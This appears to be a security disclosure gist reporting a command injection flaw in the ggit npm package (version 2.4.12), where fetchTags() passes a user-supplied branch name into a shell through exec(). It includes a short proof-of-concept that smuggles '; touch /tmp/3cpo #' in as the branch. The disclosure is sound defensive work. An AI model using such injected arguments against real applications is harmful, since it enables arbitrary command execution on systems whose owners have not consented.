@lirantal
Created April 21, 2023 12:36
Command Injection vulnerability in `ggit@2.4.12`

ggit describes itself as:

Local promise-returning git command wrappers

Resources:

Background on exploitation

I'm reporting a Command Injection vulnerability in the ggit npm package.

This vulnerability manifests in the library's fetchTags(branch) API, which lets user input specify the branch to be fetched and then concatenates that string into a git command line, which is passed to the unsafe exec() Node.js child process API (exec() runs the line through a shell, so shell metacharacters in the branch name are interpreted).

Exploit

  1. Install ggit@2.4.12 or earlier
  2. Establish the following POC:

     ```js
     const fetchTags = require("ggit").fetchTags;
     fetchTags("; touch /tmp/3cpo #").then(function () {
       // should be same as running command
       // git pull origin --tags
       console.log("done");
     });
     ```

  3. Observe the new file created on disk at /tmp/3cpo

Author

Liran Tal
